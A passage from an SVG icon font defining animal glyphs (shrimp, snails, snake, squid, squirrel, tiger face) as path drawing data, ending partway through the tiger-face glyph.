<glyph glyph-name="shrimp-alt" horiz-adv-x="1000" unicode="&#xe887;" d="M830 501c5 8 9 17 12 26 6 15 7 28 1 29-4 1-7 2-9 3-99 28-197 55-295 84-59 18-119 21-180 12-51-8-44 3-42-52 9-183 185-282 326-251 86 19 146 73 187 149z m-169 64c15-4 26-22 22-37-4-15-22-25-37-21-15 4-25 21-21 37 4 15 21 25 36 21z m-231-235c-15 16-21 26-7 30s9 16-8 30c-67 53-106 123-113 211-2 22-3 39-5 38-2 0-3 0-4-1-65-26-119-68-162-123-3-5-4-12-3-18 5-93 47-166 122-219 8-6 17-11 25-15 14-7 34-1 43 14 6 9 11 18 17 27 3 3 10 6 15 5 28-4 49-29 48-58 0-4 0-9-1-14-1-7 7-4 12 10 3 9 4 18 3 27-2 15-8 26-17 35-16 15-31 26-22 27 5 1 10 0 16-4 25-15 38-37 38-67 1-11-2-22-7-31-7-16 0-21 14-4 9 10 14 23 16 38 3 26-4 46-20 62z m-116-201c-10 21-15 43-16 67-1 21-13 45-33 56-77 41-124 106-145 192-5 21-10 35-12 31-2-3-3-5-5-8-20-39-33-80-38-124-11-100 13-190 76-269 4-5 12-9 19-10 31-6 62-5 94 1 15 3 30 7 45 12 20 8 24 33 15 52z m220-79c-2-1-3-1-4-1-65-26-125-16-179 30-3 2-10 2-14 1-16-7-32-15-49-21-26-10-54-14-81-13-22 0-40 2-40 1 0 0 0-1 0-1 1-1 2-3 3-4 75-75 166-106 270-104 3 0 8 2 11 4 27 23 54 47 72 78 3 5 5 10 7 15 5 9 6 15 4 15z m118 162c-3 11-6 21-10 31-4 10-10 20-17 28-11 14-23 18-21 15l4-7c35-66 26-137-25-190-15-16-28-32-36-53-10-24-24-46-43-65-14-16-26-28-24-28 2 0 3 0 3 1 78 20 141 62 183 132 14 23 24 49 38 71 38 59 96 85 164 90 2 0 5 1 7 1 4 0-9 7-30 13-60 14-111-2-156-42-16-15-31-14-37 3z m225 398c29-27 28-53-3-78-2-2-4-4-6-5-9-4-14-11-18-18-7-13-6-24-1-23 3 0 6 0 9 1 27 7 50 22 66 45 17 24 18 49 3 73-8 12-18 23-29 32-30 25-65 41-101 55-72 26-146 45-222 57-91 15-183 19-274 3-79-14-153-41-216-93-5-3-9-7-14-11-7-7 3-3 21 8 16 10 31 19 47 26 109 50 223 64 341 54 103-8 201-35 298-71 35-13 70-29 99-55z m-79-337c15 6 30 12 45 18 20 8 19 20-3 20-44-1-96-21-126-47-16-15-8-22 12-12 21 11 43 18 67 20 2 0 4 0 5 1z" />
<glyph glyph-name="shrimp" horiz-adv-x="1000" unicode="&#xe888;" d="M215 550c9-24 18-48 29-72 11-27 24-53 37-80 7-15 18-19 33-11 24 12 46 25 69 37 5 3 9 6 13 9 2 1 3 2 2 4-3 6-3 13-5 19-7 29-13 57-17 86-3 18-4 37-7 55-2 14-13 24-26 22-5 0-11-2-16-3-33-7-64-18-95-30-13-5-19-18-19-29 0-2 1-5 2-7z m194 78c-16 2-26-13-25-25 1-19 3-39 6-58 5-32 12-65 19-97 4-14 13-20 27-18 29 4 57 8 86 12 16 2 23 11 21 27-3 33-4 67-2 101 1 11 2 23 2 34 0 11-9 20-20 21-26 1-53 2-80 3v0c-11 0-23-1-34 0z m-253-231c6-5 11-12 18-16 0-2 1-2 3-3 17-15 34-30 51-45 3-2 7-4 11-5 7-2 10 0 14 7-6 2-12 5-17 10l-29 28c-7 6-14 13-21 19 0 1-2 2-2 3-9 9-18 18-27 28 2 0 2-1 3-2 24-21 50-41 76-61 6-5 11-10 19-12 4-1 8-1 11 2 6 6 11 13 17 20 1 2 1 4-1 5-5 3-9 7-11 13-8 14-15 29-22 44-14 29-27 59-39 90-3 9-15 12-24 6-21-16-40-36-58-56-4-5-8-8-11-14-4-8-1-21 6-29 11-10 22-21 33-32z m52-245c12 3 16 8 13 20-33-10-67-17-102-24 2 2 4 2 5 3 8 2 16 4 23 7l59 20c8 3 12 9 11 17-1 12-2 24-3 37-1 3-2 3-4 3-25 3-49 5-73 10-15 2-30 5-45 8-3 1-4 1-5-2-1-9-3-17-4-26-3-26-2-53 1-79 0-6 3-11 6-16 4-5 9-7 16-6 14 3 29 7 43 10 20 6 39 12 59 18z m119-90c-10 12-22 18-40 17-7-1-17 0-25-7-12-10-24-19-36-30-11-10-11-12-3-24 1-1 1-2 2-2 7-10 16-18 26-25 13-9 27-11 43-6 17 6 34 15 49 25 14 8 15 17 5 30l-21 22z m-83 25c-1 0-1 1-2 2-2 4-4 3-7 1-11-8-23-15-34-23l-1 1c1 1 1 2 2 2 9 10 18 20 28 30 3 2 3 5 1 8-4 9-8 18-11 27-2 3-3 4-7 3-28-8-56-17-84-24-2 0-3-1-4-2-5-14-5-31 8-43 12-13 28-20 44-26 8-4 16-4 23-3 3 0 4 0 6 2 11 12 24 23 37 33 6 5 6 5 1 12z m210 26c-5 6-10 7-16 7-20-3-34-14-43-30-7-11-16-18-27-23-6-3-12-5-18-7 5-7 10-12 13-18 4-7 7-13 6-21-1-4 1-4 3-4 6 1 11 2 17 3 32 6 59 23 82 46 8 8 8 13 3 22-6 10-14 17-20 25z m470 551c0 3-2 4-4 6-5 7-11 14-19 17-2 1-3 2-5 3-11 7-24 11-37 11-1 1-1 2-2 2-10 0-20 1-30-1-36-5-71-13-107-19-23-4-46-8-69-8-23 0-46 4-70 8-24 4-48 11-72 17-2 0-3 2-4 0-3 2-7 3-11 3-2 2-5 2-8 2-43 10-86 16-130 12-5-1-10-1-15-2-5-1-10-2-14-3 1-1 3-1 4 0 18 3 36 5 54 5 35-1 69-7 102-15 2-1 5-2 7 0 3-4 8-4 13-4 2-2 5-3 8-3 27-7 53-15 80-19 26-5 52-7 78-5 32 2 64 9 96 14 22 3 43 9 65 10 6 0 13 0 19 1 1-2 2-1 4-2 17-2 33-7 46-19 20-18 26-41 25-66 0-24-7-46-18-67-17-33-41-61-70-84-16-13-34-23-56-24-3-1-7 1-10-2-2 2-4 2-6 2-13 2-24 7-35 15 12 5 18 13 23 24 9 20 17 40 29 58 10 16 22 31 39 40 5 3 10 4 16 7-2 0-3 1-4 1-25 6-50 5-75 1l-61-14c-10-1-20-2-29 0-15 4-27 10-40 18-16 11-30 22-45 33-8 6-12 6-17-3-6-10-8-20-10-31-6-26-4-53-4-80 0-7 5-10 10-13 2-1 5-2 7-3 14-3 27-7 40-11 16-6 32-12 46-22 4-3 9-6 14-7 5 0 6-3 7-7 4-15 5-29 5-44 0 1 1 3 1 4 4 14 5 27 4 41 0 2 1 4 4 4 6-1 13-1 19 0 4 1 6-1 9-3 11-9 24-16 38-19 8-1 16-3 24 0 2-1 4-1 5-1 17 2 32 9 45 18 24 15 43 34 59 56 24 31 41 64 45 103 2 23 0 45-13 65z m-214-136c0 13 11 23 23 23 14-1 24-11 23-24 0-13-11-23-24-22-14 1-22 9-22 23z m-307-240c3-1 7 2 8 6 1 3 2 6 3 9 8 34 12 69 6 105-2 6-3 11-9 13-2 0-3 3-6 1-2-2-2-4-1-6 6-23 6-45 4-68-2 0-2 1-2 2-3 18-11 34-20 49-4 8-4 8-12 4-4-2-4-4-2-7 7-11 14-23 18-36 6-21 8-42 7-64 0-4 1-7 6-8z m37 16c-1-4 0-7 4-8 4-2 6 0 8 3 1 1 2 3 3 4 6 11 11 22 16 34 10 24 17 50 20 76 1 11 1 11-9 9-3 0-4-2-4-5-1-15-5-29-9-44-1-6-4-12-6-18-1 3-1 6-1 8 0 7 1 13-2 19 1 0 1 0 1 1-1 11-4 22-7 33 0 2-2 1-3 1-4 0-7 0-10-2 0 0 0 0 0-1 2-6 2-12 5-18-1-1 0-2 0-3 3-16 3-31 1-47-1-14-3-28-7-42z m-117 72c-2-2-2-2-1-4 3-5 6-9 9-13 14-22 19-47 22-72 0-5 1-8 7-9 4 0 6 2 7 8 4 21 4 43 3 64-1 15-4 29-7 42-1 2 0 4-3 3-3-2-7-3-10-6-1-1 1-5 1-7 4-14 5-29 5-43-5 11-10 22-17 33-6 9-6 9-16 4z m-42-45c-5 8-5 7-11 1-3-3-3-5-1-8 7-9 12-19 15-29 5-15 9-29 11-44 0-6 6-9 10-6 3 2 3 5 3 7 4 29 3 57-2 85-2 10-5 20-9 30-2-4-3-7-6-10-3-2-3-4-2-7 4-10 5-21 6-32 1-2 1-5 1-7 1-2 1-5 0-8-4 10-9 19-15 28z m213-244c-1-1-3-2-3-4 2-6 1-11-1-16 44 48 84 98 107 159-8-18-18-35-30-52-22-31-47-60-73-87z m62 129c-7-11-14-22-22-32-18-23-37-44-56-65-6-5-6-5-1-11 4-4 4-4 7 0 18 22 34 43 49 66 9 13 17 27 23 42z m-128-83c3 0 5 2 7 4 21 28 40 57 54 89 1 3 2 6 3 8 0 3 3 5 2 10-20-46-50-83-84-118 3 1 6 3 9 4 3 1 6 2 9 3z m33-7c3-3 5-3 7 1 16 23 33 47 46 72 4 6 7 12 9 19l-1-1c-18-29-40-55-62-80-5-5-5-5 1-11z m126 342c-4 2-8 3-13 4 4-7 10-11 16-13 15-4 20-15 25-28 4-12 5-25 5-38 1 15 1 30-3 44-4 16-14 26-30 31z m-443-207c0-1 2-1 3-1 21-4 43-9 64-13 4-1 8-1 11 0 8 2 10 5 12 12-7-1-14-1-20 1l-37 9c-9 2-18 5-27 6 0 1-2 1-3 1-11 4-23 7-35 11 2 1 3 0 4 0 30-6 61-11 92-16 7-1 14-3 22-1 4 1 8 3 10 6 3 8 5 15 8 23 0 3-1 4-3 4-6 1-11 2-15 5-12 8-24 17-37 26-23 17-46 35-68 54-7 6-19 3-24-5-15-23-25-46-33-70-2-5-5-10-5-15-1-9 6-18 16-20 14-4 27-8 42-12 7-2 14-4 23-5z" />
<glyph glyph-name="snail-1" horiz-adv-x="1000" unicode="&#xe889;" d="M680 672c-2 10-6 21-4 32 3 16 9 29 21 38 2 2 30 22 66 1 17-12 27-39 21-57-6-16-15-29-30-37-5-3-5-9-3-13 5-16 8-33 15-49 3-6 4-9-4-10s-17-7-25-10c-4-1-5-1-8 3-11 18-22 36-31 55-8 15-13 31-18 47z m141-86c10-1 19-1 28-3 9-3 9 0 10 7 0 18 6 36 9 53 1 5 3 10 10 10 17 1 32 8 45 21 15 13 19 43 9 63-23 38-59 33-62 32-16-3-28-12-38-25-7-10-9-21-12-33-4-17-7-34-7-52 0-22 1-44 3-67 0-5 1-6 5-6z m111-184c-10-31-29-57-60-72-3-1-4-4-4-7-1-20-3-41-3-61 0-33-8-65-16-96-8-34-22-66-42-94-17-25-37-47-61-66-21-17-44-30-67-40-11-5-22-9-34-12-113-41-333-16-333-16-27 2-53 5-80 8-31 4-62 9-93 16-26 7-62 7-73 32-2 4-3 13 0 16 2 5 8 6 13 7 19 6 38 9 57 9 13 0 25 3 38 3-10 7-18 16-26 24-13 13-25 27-35 43-6 9-11 18-16 27-56 114-27 220-27 220 5 18 13 37 21 53 13 24 28 47 46 68 16 17 33 33 52 46 23 16 48 30 76 39 28 9 56 14 85 15 24 1 48 0 71-5 27-5 54-14 79-28 31-17 59-38 83-64 29-33 52-70 64-113 4-13 9-26 10-41 2-16 3-32 5-48 0 2 2 3 2 4 4 22 11 43 15 65 7 36 10 71 12 107 1 28 9 51 25 73 22 28 50 44 85 48 38 4 71-8 99-35 18-17 30-39 35-64 4-21 4-42-3-61z m-353-93c-5 21-12 41-22 60-15 27-34 51-59 70-34 26-72 42-115 45-19 2-38 2-57-1-23-3-45-11-66-22-43-23-76-55-97-99-20-40-27-82-21-126 4-29 12-57 27-81 18-32 43-58 75-78 18-12 37-19 58-26 19-7 36-2 53 6 11 5 20 12 29 19 25 21 43 47 55 77 8 20 7 40 7 59-2 35-13 65-41 86-22 15-45 21-72 13-16-5-23-25-22-37 3-14 16-24 32-25 12-1 23-4 30-15 7-11 10-23 5-35-5-12-14-21-28-22-21-2-41 2-60 13-22 12-38 30-46 54-6 18-6 37-3 55 3 23 14 43 30 58 15 15 33 24 54 28 18 3 36 3 55 0 18-2 34-8 50-17 20-10 37-25 51-43 13-18 23-38 29-60 4-15 8-31 10-47 3-49-9-94-34-137l9 7c22 17 40 36 54 59 16 26 26 53 31 83 5 27 5 53-1 79z" />
<glyph glyph-name="snail-2" horiz-adv-x="1000" unicode="&#xe88a;" d="M68 148c24 40 56 72 96 96 11 6 18 8 29-2 56-48 155-37 199 21 11 14 17 13 31 4 59-37 121-61 193-45 15 3 27-6 40-11 19-8 30-2 38 15 2 4 4 8 6 12 22 43 44 55 92 46 15-2 18 1 21 14 4 17 9 34 14 51 2 10 7 19-2 30-7 8-1 17 7 22 7 4 16 3 22-4 7-8 6-16-1-24-17-21-30-56-33-97 0-3 3-4 5-2 28 33 65 51 77 92 3 9 8 16 19 15 10-1 16-7 17-17 0-11-7-16-16-18-36-16-62-45-87-74-7-6 1-11 5-15 22-28 26-58 11-89-15-33-44-48-79-48-227 0-453 0-679 0-9 0-26 2-30 10-2 5 5 18 5 18z m700 69c9 3 16 8 16 18-1 11-9 18-20 16-10-1-16-8-15-18 2-10 8-16 19-16z m-439 188c46-14 60-32 62-72 2-44-18-79-55-94-63-26-131-1-163 60-58 112 2 249 120 276 87 20 193-27 242-107 41-66 57-138 62-214 1-15-4-20-19-20-53 0-100 19-144 47-7 4-6 11-7 18-3 30-11 59-29 83-17 23-37 33-69 23z" />
<glyph glyph-name="snail-3" horiz-adv-x="1000" unicode="&#xe88b;" d="M913 446c-52 111-179 169-296 143-153-34-284-263-128-407l0 0c-11-17 3-25 13-34 86-84 227-93 326-22 103 73 138 206 85 320z m-164-308c-85-45-202-25-258 43 39-16 76-37 119-45 124-21 247 112 210 228-19 58-74 97-133 93-48-3-86-36-95-83-8-44 14-73 51-89 29-13 55-2 72 23 13 20 14 40-2 59-13 13-28 17-45 9-13-6-22-18-16-35 4-11 12-15 23-13 22 4 13 20 11 34 18-8 22-19 12-34-8-11-18-20-33-16-16 6-29 15-30 34-1 29 13 48 41 51 37 5 60-14 67-49 8-34-6-61-35-78-32-20-66-18-97 2-64 41-64 136-2 187 82 67 210 22 247-85 30-88-16-188-107-236z m-595 382l1 0 0 1-1-1z m232-150c-7 38-14 76-31 112-30 63-88 87-153 62-16-7-32-16-47-24-106-149-30-371 151-422 77-22 155-24 246-7-114 65-147 168-166 279z m-319 242c-9-12-4-26 6-28 38-7 54-42 81-62-3 41-52 55-58 96-1 7-20 5-29-6z m87-92l1 1c0 1-1 1-1 1 0 0 0-1 0-2z" />
<glyph glyph-name="snail" horiz-adv-x="1000" unicode="&#xe88c;" d="M831 281c1 149-122 263-260 261-141 2-263-116-262-261 1-146 121-258 260-259 137 0 261 109 262 259z m-247-191c-120 0-218 98-214 217 3 125 105 215 224 210 110-5 203-93 204-211 1-128-102-216-214-216z m-256 330c2 3 4 7 7 10 23 38 54 68 92 92-49 32-97 63-151 81-9 3-13 7-13 16-2 28-2 55 0 83 0 9 2 17 10 24 8 7 7 16 0 24-8 8-17 9-26 1-8-6-11-16-3-23 10-9 9-20 10-31 1-24 0-49 0-73 0-11-2-15-14-15-20 1-28-7-30-27 0-6-2-8-8-9-33-3-65-2-97 1-5 0-7 2-10 6-7 9-19 10-27 3-7-7-7-20-1-27 8-8 19-8 28 1 3 3 4 6 9 6 26 1 51 2 77 2 22 0 31-9 43-30 1-3 2-6 4-9 20-39 46-74 73-109 15-19 15-19 27 3z m603-419c-23 59-63 107-103 158-27-53-65-93-116-122 43-29 84-56 129-75 22-10 44-19 69-18 19 0 29 12 27 31-1 9-3 17-6 26z m-292 473c-88 0-148-62-150-147-2-81 69-149 149-148 80 0 146 67 146 148 4 81-67 148-145 147z" />
<glyph glyph-name="snake" horiz-adv-x="1000" unicode="&#xe88d;" d="M861 382c-4 25-4 52-13 76-9 21-20 43-37 57-9 7-16 12-26 16-14 4-31 2-44-4-29-15-48-39-53-72-2-15-3-29-4-44-1-24-1-24 23-22 19 2 19 2 22 21 2 18 5 36 16 52 12 17 31 20 46 8 8-6 14-14 18-24 10-24 15-50 19-76 1-3 0-8 3-9 9-1 18 3 26 7 7 3 5 8 4 14z m-170 1c-8 1-10-3-10-10-1-25-5-50-12-74-3-15-9-28-20-39-12-12-32-10-42 3-4 6-9 13-11 20-2 6-6 7-11 8-12 1-37-13-42-23-1-2-1-4-1-6 6-19 14-37 28-51 50-46 122-26 142 39 13 44 11 89 14 135-12-2-23-4-35-2z m-115 130c-1 19-7 36-19 52-25 34-83 39-112 10-27-26-36-59-38-95-1-32 0-33 33-40 8-2 11-2 11 9-1 20 1 41 11 60 15 29 48 33 60 3 2-4 4-5 9-3 14 7 30 9 45 4z m11-215c5 0 2 5 2 8-8 31-9 62-9 94 1 32 2 63 0 94 0 9-4 13-11 14-14 3-26 0-38-7-3-2-4-4-3-8 4-33 2-66 2-99-1-40 0-79 9-120 8 8 14 14 22 18 8 4 16 6 26 6z m-141 134c-12 2-24 7-36 10-3-35-7-50-17-67-15-28-36-34-62-19-7 4-8 2-10-4-4-11-4-22-6-32-2-16 5-23 18-28 35-14 67-8 88 19 25 34 31 75 30 116 0 4-1 5-5 5z m-132-63c-3 3-6 6-9 10-24 26-51 50-84 64-3 2-6 5-9 2-8-7-9-18-11-28-1-8 2-12 8-15 17-10 30-24 43-39 17-19 33-40 56-56 2 19 0 38 9 54 2 4-1 6-3 8z m-174 94c-28 0-53-8-73-30-6-7-6-13 1-19 14-14 34-18 53-8 21 12 43 16 66 7 5-2 7-1 7 4 1 12 4 23 11 33-22 9-43 13-65 13z m-48-39c-4-3-8-2-10 3-2 4-1 7 3 9 4 3 8 1 10-1 3-5 1-9-3-11z m773-222c3 1 6 2 9 3 7 1 8 5 6 11-10 27-11 56-12 85-1 20-2 41-5 61-9-3-17-8-27-8-7-1-5-6-5-10 1-22 2-43 4-64 2-24 6-47 13-69 3-9 7-14 17-9z m30-21c-10 19-9 20-30 14l-1-1c-6-1-7-3-5-8 4-10 10-19 16-27 17-23 37-42 62-53-15 25-30 49-42 75z" />
<glyph glyph-name="squid" horiz-adv-x="1000" unicode="&#xe88e;" d="M837 103c0-35-28-63-62-63s-63 28-63 63c0 2 0 4 0 6 7-4 14-6 22-6 23 0 42 19 42 42 0 7-2 14-5 20 1 0 2 0 4 0 34 0 62-28 62-62z m63-51c-10-25-25-48-44-70-35-37-77-62-127-68-12-2-37-2-50 0-32 5-62 18-86 41-37 34-63 73-67 123-4 59-45 97-104 93-43-2-85-12-128-8-66 6-116 43-123 117-3 44 1 86 11 127 11 45 8 84-35 113 42-1 78-36 80-74 1-32 0-65 0-98 0-19 3-38 9-56 9-23 24-36 50-37 46-2 91 6 135 14 12 2 25 4 38 7-5 10-14 14-22 19-17 11-34 22-51 33-66 45-101 108-114 186-2 17-6 35-11 52-18 58-51 83-112 84-20 1-40-1-64-5 15 13 28 16 41 20 31 8 63 11 95 6 32-6 52-24 67-52 16-31 24-65 34-99 15-47 41-82 90-99 33-13 66-26 102-29 9-1 11 0 10 10-3 15-1 31-2 46-4 39-17 73-52 94-34 21-65 45-95 71-55 48-67 107-58 175 3-34 12-67 32-95 13-17 28-33 49-42 40-18 79-40 113-67 50-38 88-85 101-148 0-4 1-8 2-12 1-1 2-1 3-4 20 25 41 49 57 75 18 29 12 59-8 86-18 24-42 41-69 53-12 6-24 11-36 17-48 20-64 49-56 103 8-6 6-14 7-21 7-32 25-51 57-60 36-10 71-22 102-43 31-20 59-45 74-80 19-46 1-87-22-127-9-17-18-35-17-55 0-27 9-37 36-40 41-4 77-18 109-45 32-27 49-62 59-100 1-5 15-64-10-131z m-40 142c-14 35-42 57-74 70-40 16-83 7-118-19-57-43-82-102-73-176 8-63 64-117 129-114 34 1 73 15 100 47 48 57 65 120 36 192z" />
<glyph glyph-name="squirrel" horiz-adv-x="1000" unicode="&#xe88f;" d="M883 0c-16 3-33 6-49 11-31 10-43 25-46 58-5 57-4 115 2 173 3 21 6 41 19 59 12 17 30 20 48 8 7-4 14-9 23-11 19-7 36 4 37 25 1 12-3 23-9 33-10 16-24 30-37 43-13 13-28 24-39 37-25 28-19 65 12 85 11 7 23 12 35 16 13 6 27 11 39 19 18 12 24 30 16 51-5 13-13 23-23 33-32 33-71 56-113 71-17 7-26 16-31 32-2 9-5 18-11 26-8 11-19 12-29 1-4-6-7-12-9-19-4-9-5-20-8-32-3 6-5 11-8 16-6 12-14 25-26 34-15 12-33 6-38-12-2-7-3-14-3-20-2-31 3-60 7-90 3-29 6-58-2-87-10-37-29-69-50-100-32-47-69-91-102-139-42-62-73-128-73-205 0-6-3-4-6-3-20 8-36 21-43 41-9 22-7 44-2 66 11 47 28 91 44 135 18 51 32 102 31 156-2 81-37 141-111 176-76 35-163 19-218-37-51-52-71-159-8-222 49-50 127-65 188-31 13 7 24 16 35 25-1-3-3-5-5-8-18-23-40-43-63-62-29-24-62-45-90-71-51-46-84-100-81-172 3-69 31-123 91-159 42-25 88-27 135-18 53 10 91 38 114 87 1 2 1 4 3 4 5-10 9-20 15-29 31-49 79-70 133-71 102-2 204 0 306-1 10 0 21 2 30 8 19 11 24 32 10 49-10 13-24 18-40 21z m-107 635c0 12 9 21 21 21 12 1 21-9 22-21 0-12-9-21-22-21-12 0-21 9-21 21z" />
<glyph glyph-name="tiger-face" horiz-adv-x="1000" unicode="&#xe890;" d="M902 314c-19 12-31 31-43 50 15 3 30 5 41 18-28 1-41 17-50 40 17 1 33 1 44 19-24 0-42 9-55 28-11 17-18 34-20 54-1 8-2 17-5 25-1 5 0 9 2 15 21 43 34 88 31 137-3 29-16 44-45 47-38 4-73-6-106-25-5-4-8-4-11 2-4 9-12 13-20 16-8 2-15 3-23 5 7 3 13 3 20 5-24 10-47 20-75 18 7 6 14 7 21 10-9 7-20 10-30 9-27 0-50-10-70-27-6-6-9-6-15-1-20 19-44 29-71 28-10 0-20-2-29-10 7-2 14-3 22-10-29 3-52-7-75-17 6-2 13-2 20-6-6-1-11-1-16-2-11-3-22-6-27-17-4-7-6-7-13-3-32 19-68 29-106 25-27-4-41-19-43-47-4-49 9-94 30-138 2-3 5-5 3-9-5-16-4-34-9-49-9-26-20-49-47-60-8-3-16-3-25-4 11-17 27-17 45-18-10-23-23-39-50-40 11-14 26-15 40-19-13-21-26-40-47-53 13-17 30-15 48-11 5 2 8 2 6-5-6-29-18-55-40-76-1-1-3-2-2-4 22-5 41-1 57 16 4 5 7 4 9-1 6-14 11-27 14-42 4-22 4-45 0-69 22 10 35 27 46 46 13-23 18-45-3-66 15-3 29-7 43-2 16 6 19 20 23 36 7-15 5-28 1-40-7-21-8-41-6-62 1-11 3-21 10-31 4 24 11 45 28 62-3-17-6-35-4-52 2-18 9-34 25-46 2 27 8 42 18 48 0-34 8-63 42-80 0 6-3 11-1 17 11-15 21-29 40-35-3 11-3 21 2 34 11-21 28-34 49-34 22-1 39 13 51 33 5-12 5-22 2-34 19 7 29 21 40 36 2-6-2-11-1-17 16 7 27 19 34 34 7 15 8 31 9 49 12-16 17-33 17-52 32 29 27 64 21 99 17-17 23-38 27-62 8 11 10 21 11 31 2 21 0 42-6 62-4 13-7 26 0 39 8-36 28-45 65-32-16 24-17 46-1 64 11-19 24-35 44-44 1 1 1 1 1 2l0 5c-5 34-1 67 13 99 3 8 6 11 14 3 15-16 33-19 55-14-24 22-36 48-43 77-2 9-1 11 8 8 14-4 29-6 41 6 4 3 6 5 0 9z m-52 3c-12 5-12 5-11-8 1-28 9-55 28-79-13 3-20 11-28 19-6 5-9 6-14-2-19-29-29-61-26-97-15 11-21 26-27 43-15-21-27-41-28-65-1-5 1-9 2-13 0-3 5-5 2-8-3-3-7-2-11-1-13 4-15 16-17 27-2 10-1 20-4 32-24-21-33-45-24-75 4-12 9-24 8-40-8 15-16 25-29 30-4 1-7 2-11 3-6 1-8 0-6-7 4-14 9-28 11-42 1-12 1-23-3-37-5 19-16 29-32 33-12 3-13 2-11-10 3-11 5-23 2-36-1-5-3-9-5-13-3-4-5-8-9-8-5 0-2 6-4 9-2 2-3 5-5 8-3 4-6 10-11 8-6-2-1-8-1-12 1-15-5-27-18-36-3 8-4 16-10 23-6 5-9 7-13-2-5-10-11-20-21-27-1-1-3-3-5-2-3 1-1 3-2 5 0 2 0 3 0 4-1 12-10 26-16 26-7 0-16-15-17-27 0-3 0-6 0-10-14 7-21 19-27 31-4 9-8 7-13 1-5-6-8-14-9-23-15 11-21 24-19 41 1 3 3 6 0 8-3 2-6-1-8-3-7-6-10-14-12-23-11 7-15 17-16 29-1 11 1 23 4 34 1 6-1 7-7 6-18-4-31-13-37-34-4 16-4 30-1 43 2 12 6 24 9 36 2 7 0 8-7 7-17-4-29-15-38-33-2 13 1 22 4 31 4 14 9 29 5 45-3 15-13 27-25 40-4-12-3-22-4-32-2-17-10-27-22-28-5-1-9-1-5 7 3 6 3 13 2 20-3 22-14 41-28 60-5-17-12-32-26-43-1 14 0 26-2 39-4 23-15 43-27 62-3 4-4 3-7 1-6-5-11-10-16-14-4-3-9-7-16-8 19 25 26 51 28 80 1 11 1 12-10 8-10-5-20-9-33-6 21 23 35 49 49 77-12-4-19-13-32-11 19 17 27 40 36 64-9-3-15-8-26-6 15 10 24 23 32 37 11 18 14 37 17 57 0 5 0 10 2 13 6 10 3 17-2 26-20 39-32 80-30 125 1 30 13 41 44 41 31 0 61-7 87-25 15-10 29-11 44 0 5 3 11 6 18 9-10 6-19 4-29 2 5 6 11 7 18 8 16 3 33 3 50 5 2 0 6-1 7 2 1 3-3 5-5 6-8 7-18 7-28 9 17 6 34 5 51 0 5-1 10-3 14-4 5-1 11-6 14-1 4 5-1 10-5 15-4 5-9 9-15 12 24-2 44-12 59-30 8-9 12-8 19 0 16 18 36 28 59 31-7-5-14-10-18-18-2-3-4-7-2-10 2-4 7-2 10-1 12 4 23 9 36 10 11 1 23 0 37-4-13-2-23-2-32-9-2-1-5-3-4-5 0-4 4-3 7-3 16-2 33-2 50-5 6-1 13-2 20-8-12 1-21 4-32-2 12-6 22-12 33-16 9-4 17 0 25 5 25 16 53 24 82 27 39 3 57-14 54-53-3-43-12-85-36-122-1-2-3-4-1-6 7-11 7-24 9-36 5-33 19-60 46-82-9-2-15 3-25 6 9-24 17-46 35-63-7-1-7-1-30 10 12-28 27-54 48-76-11-4-21 0-31 4z m-233-136c-19 1-36 4-53 12 1-7 8-11 11-17-12-2-21 1-30 6-17 9-28 23-38 39-5 9-3 16 3 22 1 3 4 4 6 7h-31c3-3 6-6 8-9 3-4 7-9 4-15-9-16-19-30-34-40-11-8-23-12-37-10 4 6 10 10 11 16-35-13-70-16-106 3 9-12 19-19 32-22 4-2 7-3 9-8 13-24 19-49 9-75-3-9-4-18-2-27 2-14 5-15 17-7 6 4 11 12 18 8 7-5 5-14 5-21 0-3-1-6-2-8-5-19 3-31 23-33 11-1 22 0 32 4 19 6 38 5 58-1 13-3 27-5 40-1 14 5 19 14 15 28-2 9-4 17-1 26 2 7 6 9 12 5 4-2 7-5 10-8 11-7 15-6 17 8 1 8 1 17-2 25-9 25-5 49 6 73 3 6 6 10 13 12 12 3 22 10 31 23-19-12-36-15-54-15z m-192-88c-14 17-20 37-22 58-1 1 0 4 1 4 10 1 17 10 29 10-11-24-8-48-8-72z m26-68c-5-2-9 1-10 6-4 13-5 25-1 39 5-11 11-22 17-33 2-5-1-10-6-12z m20-2c-5 0-8 2-9 6 0 4 3 6 6 6 5-1 7-4 8-8 0-3-3-4-5-4z m7 119c-5-1-6 3-7 8-2-2-3-3-3-4-4-3-8-9-14-7s-3 10-3 15c0 9 7 11 16 5 3-2 4-6 8-6 4 0 8-1 7-6 0-2-1-5-4-5z m20 5c-1-3-3-6-6-6-3 0-5 2-5 5 0 4 2 5 5 5 3 0 6 0 6-4z m12-6c-4 0-5 2-6 5-1 4 2 5 5 5 3 0 6-1 6-4 0-4-2-6-5-6z m21-118c-3 0-5 1-5 4 1 5 3 8 8 8 3 0 5-2 6-5-2-5-5-7-9-7z m1 126c-3-1-2-4-3-5-2-2-3-3-6-2-2 1-4 3-4 5 0 3 1 5 3 5 6 1 10 5 15 8 4 2 10 6 13 0 2-6 3-14-2-20-2-2-5-1-7 1-3 2-6 5-9 8z m28-119c-1-4-5-7-10-5-4 2-8 6-5 11 5 11 12 22 17 34 4-14 2-27-2-40z m39 120c-3-20-8-40-22-57-1 24 4 48-8 71 12 1 19-8 29-10 1 0 1-2 1-4z m-83 100l1-1h-1c0 1 0 1 0 1z m-16 453c6-8 10-15 16-21 17-20 41-25 66-27 19-2 38-4 57-9 16-5 31-12 43-25-22 9-45 16-70 17 22-11 43-24 59-44-38 22-78 32-122 30 17 8 35 8 53 5 0 5-4 4-6 5-23 9-47 12-71 6-9-2-20-7-20-16 0-11 11-14 20-16 19-4 37-4 56-4 13 0 26 1 38-5-14 0-27 1-41-7 30-16 61-29 73-63-10 10-21 19-34 25 0-6 5-10 3-16-27 32-62 40-102 37 34-13 64-27 89-56-15 6-28 11-42 16 2-7 7-12 4-19-9 7-18 16-28 21-13 6-26 12-38 0-3-2-4 0-6 1-10 9-20 7-31 2-13-5-23-15-34-24-3 7 1 12 4 18-15-3-27-10-43-15 25 29 56 43 89 55-32 7-65-4-102-35 0 5 3 9 5 15-15-6-26-14-35-25 2 13 11 25 29 38 13 10 27 17 44 25-15 8-28 7-44 6 10 5 19 6 27 6 23 1 45-1 67 4 7 2 15 4 20 9 5 5 5 9 0 14-5 6-13 9-20 11-25 4-48 0-71-9-1 0-2-2-5-4 20 2 38 3 55-5-22 0-42-1-63-6-21-5-40-13-59-24 16 20 37 32 58 44-25-2-49-8-72-19 15 15 34 24 56 29 14 3 30 5 45 6 36 3 66 14 83 49z m260-278c-4-14-4-28 0-42 3-8 5-17 5-27-10 8-14 3-19-4-4-8-9-16-12-25-4-10-10-13-20-10-9 3-16 8-22 